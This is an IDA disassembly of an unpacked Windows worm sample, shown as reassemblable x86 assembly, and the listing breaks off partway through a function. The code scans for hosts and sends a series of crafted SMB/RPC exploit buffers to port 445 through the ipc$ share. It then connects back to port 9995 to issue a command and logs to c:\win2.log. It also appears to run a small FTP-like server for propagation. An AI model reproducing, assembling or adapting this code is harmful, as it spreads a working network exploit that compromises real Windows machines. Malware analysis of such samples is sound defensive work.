;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 1F812C309437E0DA2ADA93DB20B22825
; File Name : u:\work\1f812c309437e0da2ada93db20b22825_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_40127D+7C�p
; sub_401F2E:loc_401F9B�p ...
mov eax, dword_406F40
imul eax, 343FDh
add eax, 279EC3h
mov dword_406F40, eax
shr eax, 10h
and eax, 7FFFh
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_40101E proc near ; CODE XREF: sub_4020C8+1F�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_406F40, eax
retn
sub_40101E endp
; =============== S U B R O U T I N E =======================================
sub_401028 proc near ; CODE XREF: sub_4020C8+24�p
var_190 = byte ptr -190h
sub esp, 190h
lea eax, [esp+190h+var_190]
push eax
push 101h
call dword_4050F0 ; WSAStartup
add esp, 190h
retn
sub_401028 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401045 proc near ; CODE XREF: sub_4010D2+4C�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call dword_405120 ; inet_addr
movsx ecx, al
mov [ebp+arg_0], eax
movsx edx, byte ptr [ebp+arg_0+2]
movsx esi, byte ptr [ebp+arg_0+3]
movsx edi, ah
test ecx, ecx
mov eax, 100h
jge short loc_40106F
loc_40106D: ; DATA XREF: .rsrc:loc_40B5B3�w
; sub_40B8DF+14�r ...
add ecx, eax
loc_40106F: ; CODE XREF: sub_401045+26�j
test edi, edi
jge short loc_401075
add edi, eax
loc_401075: ; CODE XREF: sub_401045+2C�j
test edx, edx
jge short loc_40107B
add edx, eax
loc_40107B: ; CODE XREF: sub_401045+32�j
test esi, esi
jge short loc_401081
add esi, eax
loc_401081: ; CODE XREF: sub_401045+38�j
push 1
cmp ecx, 7Fh
pop eax
jnz short loc_401095
test edi, edi
jnz short loc_4010CE
test edx, edx
jnz short loc_4010CE
cmp esi, eax
jz short loc_4010CC
loc_401095: ; CODE XREF: sub_401045+42�j
cmp ecx, 0Ah
jz short loc_4010CC
cmp ecx, 0ACh
jnz short loc_4010AC
cmp edi, 0Fh
jle short loc_4010CE
cmp edi, 20h
jl short loc_4010CC
loc_4010AC: ; CODE XREF: sub_401045+5B�j
cmp ecx, 0C0h
jnz short loc_4010BC
cmp edi, 0A8h
jz short loc_4010CC
loc_4010BC: ; CODE XREF: sub_401045+6D�j
cmp ecx, 0A9h
jnz short loc_4010CE
cmp edi, 0FEh
jnz short loc_4010CE
loc_4010CC: ; CODE XREF: sub_401045+4E�j
; sub_401045+53�j ...
xor al, al
loc_4010CE: ; CODE XREF: sub_401045+46�j
; sub_401045+4A�j ...
pop edi
pop esi
pop ebp
retn
sub_401045 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010D2 proc near ; CODE XREF: sub_40127D+9C�p
; sub_401F2E+39�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push ebx
push esi
push edi
lea eax, [ebp+var_100]
push 0FFh
push eax
call dword_405118 ; gethostname
test eax, eax
jnz short loc_401136
lea eax, [ebp+var_100]
push eax
call dword_405124 ; gethostbyname
mov edi, eax
xor esi, esi
cmp edi, esi
jz short loc_401136
mov eax, [edi+0Ch]
cmp [eax], esi
jz short loc_401136
loc_401110: ; CODE XREF: sub_4010D2+60�j
mov eax, [esi+eax]
push dword ptr [eax]
call dword_40511C ; inet_ntoa
mov ebx, eax
push ebx
call sub_401045
test al, al
pop ecx
jnz short loc_40113D
mov eax, [edi+0Ch]
add esi, 4
cmp dword ptr [esi+eax], 0
jnz short loc_401110
jmp short loc_401139
; ---------------------------------------------------------------------------
loc_401136: ; CODE XREF: sub_4010D2+20�j
; sub_4010D2+35�j ...
mov ebx, [ebp+arg_0]
loc_401139: ; CODE XREF: sub_4010D2+62�j
test ebx, ebx
jz short loc_401140
loc_40113D: ; CODE XREF: sub_4010D2+54�j
push ebx
jmp short loc_401145
; ---------------------------------------------------------------------------
loc_401140: ; CODE XREF: sub_4010D2+69�j
push offset a127_0_0_1 ; "127.0.0.1"
loc_401145: ; CODE XREF: sub_4010D2+6C�j
push [ebp+arg_0]
call dword_405018 ; lstrcpyA
pop edi
pop esi
pop ebx
leave
retn
sub_4010D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401153 proc near ; CODE XREF: sub_401F2E+126�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_10], 2
push 1BDh
call dword_405108 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push 0
push eax
call sub_402250
add esp, 10h
push 6
push 1
pop ebx
push ebx
loc_4011A1: ; DATA XREF: sub_409C14+7�r
push 2
call dword_40510C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4011B4
xor al, al
jmp short loc_4011D1
; ---------------------------------------------------------------------------
loc_4011B4: ; CODE XREF: sub_401153+5B�j
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4011C8
xor bl, bl
loc_4011C8: ; CODE XREF: sub_401153+71�j
push esi
call dword_405114 ; closesocket
mov al, bl
loc_4011D1: ; CODE XREF: sub_401153+5F�j
pop esi
loc_4011D2: ; DATA XREF: sub_409B96+1D�r
pop ebx
leave
retn
sub_401153 endp
; =============== S U B R O U T I N E =======================================
sub_4011D5 proc near ; CODE XREF: sub_401153+30�p
; sub_40127D+34�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_405120 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4011F2
test esi, esi
jnz short loc_401204
cmp byte ptr [edi], 30h
jz short loc_40120B
loc_4011F2: ; CODE XREF: sub_4011D5+12�j
push edi
call dword_405124 ; gethostbyname
test eax, eax
jz short loc_401204
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_401204: ; CODE XREF: sub_4011D5+16�j
; sub_4011D5+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_40120B
xor esi, esi
loc_40120B: ; CODE XREF: sub_4011D5+1B�j
; sub_4011D5+32�j
mov eax, esi
pop edi
pop esi
retn
sub_4011D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_40127D+F9�p
var_14 = byte ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
inc dword_406F44
push edi
push dword_406F44
lea eax, [ebp+var_14]
push offset aI ; "%i"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
push 0
push offset aCWin2_log ; "c:\\win2.log"
call dword_405024 ; _lcreat
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40127A
lea eax, [ebp+var_14]
push esi
push eax
call sub_4022B0
mov esi, dword_405020
pop ecx
push eax
lea eax, [ebp+var_14]
push eax
push edi
call esi ; _lwrite
push [ebp+arg_0]
call sub_4022B0
pop ecx
push eax
push [ebp+arg_0]
push edi
call esi ; _lwrite
push edi
call dword_40501C ; _lclose
pop esi
loc_40127A: ; CODE XREF: sub_401210+37�j
pop edi
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40127D proc near ; CODE XREF: sub_401A84+7B�p
var_348 = dword ptr -348h
var_33C = byte ptr -33Ch
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 33Ch
push ebx
push edi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_402250
add esp, 0Ch
mov [ebp+var_10], 2
push 270Bh
call dword_405108 ; ntohs
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_4011D5
mov [ebp+var_C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
call sub_402250
add esp, 10h
push 6
push 1
push 2
call dword_40510C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_4012E2
xor al, al
jmp loc_401394
; ---------------------------------------------------------------------------
loc_4012E2: ; CODE XREF: sub_40127D+5C�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40138B
push esi
call sub_401000
mov esi, eax
lea eax, [ebp+var_110]
push offset dword_406F48
push eax
call dword_405018 ; lstrcpyA
lea eax, [ebp+var_110]
push eax
call sub_4010D2
push esi
lea eax, [ebp+var_110]
push esi
push eax
push off_406030
lea eax, [ebp+var_33C]
push eax
call dword_4050E0 ; wsprintfA
lea eax, [ebp+var_33C]
xor esi, esi
push eax
call sub_4022B0
add esp, 1Ch
test eax, eax
jbe short loc_401373
loc_40134F: ; CODE XREF: sub_40127D+F4�j
push ebx
lea eax, [ebp+esi+var_33C]
push 1
push eax
push edi
call dword_405104 ; send
lea eax, [ebp+var_33C]
inc esi
push eax
call sub_4022B0
cmp esi, eax
pop ecx
jb short loc_40134F
loc_401373: ; CODE XREF: sub_40127D+D0�j
push [ebp+arg_0]
call sub_401210
mov [esp+348h+var_348], 3E8h
call dword_405028 ; Sleep
mov bl, 1
pop esi
loc_40138B: ; CODE XREF: sub_40127D+75�j
push edi
call dword_405114 ; closesocket
mov al, bl
loc_401394: ; CODE XREF: sub_40127D+60�j
pop edi
pop ebx
leave
retn
sub_40127D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401398 proc near ; CODE XREF: sub_401A84+15�p
var_744 = byte ptr -744h
var_714 = byte ptr -714h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_B4 = byte ptr -0B4h
var_B1 = byte ptr -0B1h
var_87 = byte ptr -87h
var_85 = byte ptr -85h
var_84 = byte ptr -84h
var_3C = byte ptr -3Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 744h
push ebx
push esi
push edi
push offset dword_406F48
push [ebp+arg_4]
call dword_405018 ; lstrcpyA
push [ebp+arg_0]
lea eax, [ebp+var_3C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor edi, edi
xor ecx, ecx
lea eax, [ebp+var_103]
loc_4013D1: ; CODE XREF: sub_401398+49�j
mov dl, [ebp+ecx+var_3C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4013D1
push 60h
lea eax, [ebp+var_B4]
push offset dword_4063E4
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
shl eax, 1
push eax
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_84]
push eax
call sub_402330
add esp, 1Ch
lea eax, [ebp+var_3C]
push 9
push (offset aC+3)
push eax
call sub_4022B0
pop ecx
lea eax, [ebp+eax*2+var_85]
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_2], al
lea eax, [ebp+var_2]
push eax
loc_40144C: ; DATA XREF: sub_409B96+31B�r
lea eax, [ebp+var_B1]
push eax
call sub_402330
lea eax, [ebp+var_3C]
push eax
call sub_4022B0
shl al, 1
add al, 9
push 1
mov [ebp+var_1], al
lea eax, [ebp+var_1]
push eax
lea eax, [ebp+var_87]
push eax
call sub_402330
add esp, 2Ch
push [ebp+arg_0]
call dword_405124 ; gethostbyname
mov ebx, eax
cmp ebx, edi
jz loc_401554
push edi
push 1
push 2
loc_401495: ; DATA XREF: .text:off_4065D8�o
call dword_40510C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+arg_0], esi
jz loc_401554
push 1BDh
mov [ebp+var_14], 2
call dword_405108 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebx+0Ch]
push 8
push edi
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_10], eax
lea eax, [ebp+var_C]
push eax
call sub_402250
add esp, 0Ch
lea eax, [ebp+var_14]
push 10h
push eax
push esi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_401554
mov ebx, dword_405104
push edi
push 89h
push offset dword_4061CC
push esi
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push edi
mov edi, 640h
lea eax, [ebp+var_744]
push edi
push eax
push esi
mov esi, dword_405100
call esi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jz short loc_401554
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+arg_0]
call ebx ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401558
loc_401554: ; CODE XREF: sub_401398+F2�j
; sub_401398+10B�j ...
xor eax, eax
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401558: ; CODE XREF: sub_401398+1BA�j
push 0
lea eax, [ebp+var_744]
push edi
push eax
push [ebp+arg_0]
call esi ; recv
push 46h
lea esi, [ebp+var_714]
pop edi
loc_401570: ; CODE XREF: sub_401398+1F3�j
movsx eax, byte ptr [esi]
push eax
push [ebp+arg_4]
push offset aSC ; "%s%c"
push [ebp+arg_4]
call dword_4050E0 ; wsprintfA
add esp, 10h
loc_401588: ; DATA XREF: sub_409B96+B7�w
; sub_40A3CB+50�r
inc esi
inc esi
dec edi
jnz short loc_401570
push [ebp+arg_0]
call dword_405114 ; closesocket
push 1
pop eax
loc_401599: ; CODE XREF: sub_401398+1BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_401398 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40159E proc near ; CODE XREF: sub_401A84+3B�p
; sub_401A84+5E�p ...
var_89C4 = byte ptr -89C4h
var_895C = byte ptr -895Ch
var_68EC = byte ptr -68ECh
var_687C = byte ptr -687Ch
var_5DB8 = byte ptr -5DB8h
var_4814 = byte ptr -4814h
var_4813 = byte ptr -4813h
var_3780 = byte ptr -3780h
var_2CBC = byte ptr -2CBCh
var_2CBB = byte ptr -2CBBh
var_2CB8 = byte ptr -2CB8h
var_24D4 = byte ptr -24D4h
var_24C4 = byte ptr -24C4h
var_21A0 = byte ptr -21A0h
var_219C = byte ptr -219Ch
var_2190 = byte ptr -2190h
var_1F08 = byte ptr -1F08h
var_1E8C = byte ptr -1E8Ch
var_16BC = byte ptr -16BCh
var_1211 = byte ptr -1211h
var_F24 = byte ptr -0F24h
var_E84 = byte ptr -0E84h
var_778 = dword ptr -778h
var_768 = byte ptr -768h
var_754 = byte ptr -754h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_C4 = byte ptr -0C4h
var_C1 = byte ptr -0C1h
var_97 = byte ptr -97h
var_95 = byte ptr -95h
var_94 = byte ptr -94h
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
loc_40159F: ; DATA XREF: sub_409B96+288�r
mov ebp, esp
mov eax, 89C4h
call sub_402670
mov eax, dword_406A30
push [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, dword_406A34
loc_4015BB: ; DATA XREF: sub_409B96+F0�r
mov [ebp+var_10], eax
lea eax, [ebp+var_4C]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax
call dword_4050E0 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_113]
loc_4015D8: ; CODE XREF: sub_40159E+4A�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_4015D8
push ebx
push esi
push edi
push 60h
lea eax, [ebp+var_C4]
push offset dword_4063E4
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
shl eax, 1
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_94]
push eax
call sub_402330
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_4022B0
pop ecx
lea eax, [ebp+eax*2+var_95]
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
add al, 1Ah
push 1
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_C1]
push eax
call sub_402330
lea eax, [ebp+var_4C]
push eax
call sub_4022B0
shl al, 1
add al, 9
push 1
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_97]
push eax
call sub_402330
add esp, 2Ch
push 270Bh
call dword_405108 ; ntohs
xor eax, 9999h
push 2
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push offset dword_4060E4
call sub_402330
mov ebx, [ebp+arg_4]
add esp, 0Ch
cmp ebx, 1
jz short loc_40171A
cmp ebx, 2
jz short loc_40171A
push 7D0h
lea eax, [ebp+var_F24]
push 90h
push eax
call sub_402250
mov esi, offset loc_406034
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_E84]
push esi
push eax
call sub_402330
lea eax, [ebp+var_14]
push eax
call sub_4022B0
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_768]
push eax
call sub_402330
add esp, 2Ch
imul ebx, 3Ch
mov eax, dword_406810[ebx]
mov [ebp+var_778], eax
jmp loc_4017EE
; ---------------------------------------------------------------------------
loc_40171A: ; CODE XREF: sub_40159E+115�j
; sub_40159E+11A�j
mov edi, 0DACh
lea eax, [ebp+var_2CB8]
push edi
push 90h
push eax
call sub_402250
imul ebx, 3Ch
push 4
lea eax, [ebp+var_24D4]
lea ebx, dword_406810[ebx]
push ebx
push eax
call sub_402330
mov esi, offset loc_406034
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_24C4]
push esi
push eax
call sub_402330
push 4
lea eax, [ebp+var_21A0]
push offset dword_406A28
push eax
call sub_402330
push 4
lea eax, [ebp+var_219C]
push ebx
push eax
call sub_402330
add esp, 40h
push esi
call sub_4022B0
push eax
lea eax, [ebp+var_2190]
push esi
push eax
call sub_402330
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4813]
loc_4017A6: ; CODE XREF: sub_40159E+21A�j
mov dl, [ebp+ecx+var_2CB8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, edi
jl short loc_4017A6
and [ebp+var_2CBC], 0
and [ebp+var_2CBB], 0
mov esi, 1C52h
lea eax, [ebp+var_89C4]
push esi
push 31h
push eax
call sub_402250
push esi
lea eax, [ebp+var_68EC]
push 31h
push eax
call sub_402250
add esp, 18h
loc_4017EE: ; CODE XREF: sub_40159E+177�j
push 0
push 1
push 2
call dword_40510C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jz loc_401A7D
push 1BDh
mov [ebp+var_24], 2
call dword_405108 ; ntohs
push [ebp+arg_0]
mov [ebp+var_22], ax
call sub_4011D5
mov [ebp+var_20], eax
xor ebx, ebx
push 8
lea eax, [ebp+var_1C]
push ebx
push eax
call sub_402250
add esp, 10h
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_405110 ; connect
cmp eax, 0FFFFFFFFh
jz loc_401A7D
mov esi, dword_405104
push ebx
push 89h
push offset dword_4061CC
push edi
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push ebx
mov ebx, 640h
lea eax, [ebp+var_754]
push ebx
push eax
push edi
mov edi, dword_405100
call edi ; recv
push 0
push 0A8h
push offset dword_406258
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0DEh
push offset dword_406304
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_C4]
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 68h
push offset dword_406448
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0A0h
push offset dword_4064B4
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
cmp [ebp+arg_4], 1
jz short loc_4019BB
cmp [ebp+arg_4], 2
jz short loc_4019BB
push 7Ch
lea eax, [ebp+var_1F08]
push offset dword_406558
push eax
call sub_402330
lea eax, [ebp+var_F24]
push 7D0h
push eax
lea eax, [ebp+var_1E8C]
push eax
call sub_402330
push 90h
lea eax, [ebp+var_16BC]
push offset off_4065D8
push eax
call sub_402330
add esp, 24h
and [ebp+var_1211], 0
lea eax, [ebp+var_1F08]
push 0
push 0CF8h
jmp loc_401A5E
; ---------------------------------------------------------------------------
loc_4019BB: ; CODE XREF: sub_40159E+3B8�j
; sub_40159E+3BE�j
push 68h
lea eax, [ebp+var_89C4]
push offset dword_40666C
push eax
call sub_402330
lea eax, [ebp+var_4814]
push 1B5Ah
push eax
lea eax, [ebp+var_895C]
push eax
call sub_402330
push 70h
lea eax, [ebp+var_68EC]
push offset dword_4066D8
push eax
call sub_402330
lea eax, [ebp+var_3780]
push 0A5Eh
push eax
lea eax, [ebp+var_687C]
push eax
call sub_402330
push 84h
lea eax, [ebp+var_5DB8]
push offset dword_40674C
push eax
call sub_402330
add esp, 3Ch
lea eax, [ebp+var_89C4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call esi ; send
loc_401A3D: ; DATA XREF: .rsrc:00409CFA�r
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 0
lea eax, [ebp+var_754]
push ebx
push eax
push [ebp+var_4]
call edi ; recv
push 0
push 0FDCh
lea eax, [ebp+var_68EC]
loc_401A5E: ; CODE XREF: sub_40159E+418�j
push eax
push [ebp+var_4]
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_401A7D
push 3E8h
call dword_405028 ; Sleep
push [ebp+var_4]
call dword_405114 ; closesocket
loc_401A7D: ; CODE XREF: sub_40159E+264�j
; sub_40159E+2AB�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_40159E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A84 proc near ; CODE XREF: sub_4020C8+3A�p
var_84 = byte ptr -84h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
push esi
mov esi, [ebp+arg_0]
lea eax, [ebp+var_84]
push eax
push esi
call sub_401398
pop ecx
cmp eax, 1
pop ecx
jnz short loc_401B05
lea eax, [ebp+var_84]
push offset dword_406A3C
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401AC8
push 0
push esi
call sub_40159E
push 0
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AC8: ; CODE XREF: sub_401A84+36�j
lea eax, [ebp+var_84]
push offset dword_406A38
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401AEB
push 1
push esi
call sub_40159E
push 1
jmp short loc_401AF5
; ---------------------------------------------------------------------------
loc_401AEB: ; CODE XREF: sub_401A84+59�j
push 2
push esi
call sub_40159E
push 2
loc_401AF5: ; CODE XREF: sub_401A84+42�j
; sub_401A84+65�j
push esi
call sub_40159E
add esp, 10h
push esi
call sub_40127D
pop ecx
loc_401B05: ; CODE XREF: sub_401A84+1F�j
pop esi
leave
retn
sub_401A84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B08 proc near ; CODE XREF: sub_401F2E+115�p
var_24 = byte ptr -24h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push esi
call sub_404D52 ; IcmpCreateFile
push [ebp+arg_4]
mov esi, eax
lea eax, [ebp+var_24]
or [ebp+var_1C], 0FFFFFFFFh
push 24h
push eax
xor eax, eax
push eax
push eax
push eax
push [ebp+arg_0]
push esi
call sub_404D4C ; IcmpSendEcho
test eax, eax
jnz short loc_401B3A
or eax, 0FFFFFFFFh
jmp short loc_401B43
; ---------------------------------------------------------------------------
loc_401B3A: ; CODE XREF: sub_401B08+2B�j
push esi
call sub_404D46 ; IcmpCloseHandle
mov eax, [ebp+var_1C]
loc_401B43: ; CODE XREF: sub_401B08+30�j
pop esi
leave
retn
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B46 proc near ; DATA XREF: sub_401EA3+74�o
var_8E4 = byte ptr -8E4h
var_4E4 = byte ptr -4E4h
var_4E0 = byte ptr -4E0h
var_E4 = byte ptr -0E4h
var_60 = byte ptr -60h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8E4h
push ebx
mov ebx, [ebp+arg_0]
cmp ebx, 0FFFFFFFFh
jz loc_401E67
push esi
push edi
push 0
push off_4068D0
call sub_4022B0
mov esi, dword_405104
pop ecx
push eax
push off_4068D0
push ebx
call esi ; send
mov edi, [ebp+arg_0]
jmp short loc_401B84
; ---------------------------------------------------------------------------
loc_401B81: ; CODE XREF: sub_401B46+310�j
mov ebx, [ebp+arg_0]
loc_401B84: ; CODE XREF: sub_401B46+39�j
push 0
lea eax, [ebp+var_4E4]
push 400h
push eax
push ebx
call dword_405100 ; recv
and [ebp+eax+var_4E4], 0
mov [ebp+var_10], eax
lea eax, [ebp+var_4E4]
push offset aUser ; "USER"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401BD5
push 0
push off_4068D4
call sub_4022B0
pop ecx
push eax
push off_4068D4
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401BD5: ; CODE XREF: sub_401B46+73�j
lea eax, [ebp+var_4E4]
push offset aPass ; "PASS"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz short loc_401C06
push 0
push off_4068D8
call sub_4022B0
pop ecx
push eax
push off_4068D8
jmp loc_401E4F
; ---------------------------------------------------------------------------
loc_401C06: ; CODE XREF: sub_401B46+A4�j
lea eax, [ebp+var_4E4]
push offset aPort ; "PORT"
push eax
call sub_4026A0
pop ecx
test eax, eax
pop ecx
jz loc_401CE2
lea eax, [ebp+var_4E0]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_4027C0
mov ax, word_406A5C
mov [ebp+var_4], ax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_E4]
push eax
call sub_402720
add esp, 10h
mov ebx, eax
xor edi, edi
loc_401C55: ; CODE XREF: sub_401B46+159�j
test ebx, ebx
jz short loc_401C89
cmp edi, 4
jge short loc_401C6C
push ebx
call sub_401E6E
pop ecx
mov [ebp+edi*4+var_38], eax
cmp edi, 4
loc_401C6C: ; CODE XREF: sub_401B46+116�j
jnz short loc_401C78
push ebx
call sub_401E6E
pop ecx
mov [ebp+var_18], eax
loc_401C78: ; CODE XREF: sub_401B46:loc_401C6C�j
cmp edi, 5
jnz short loc_401C8C
push ebx
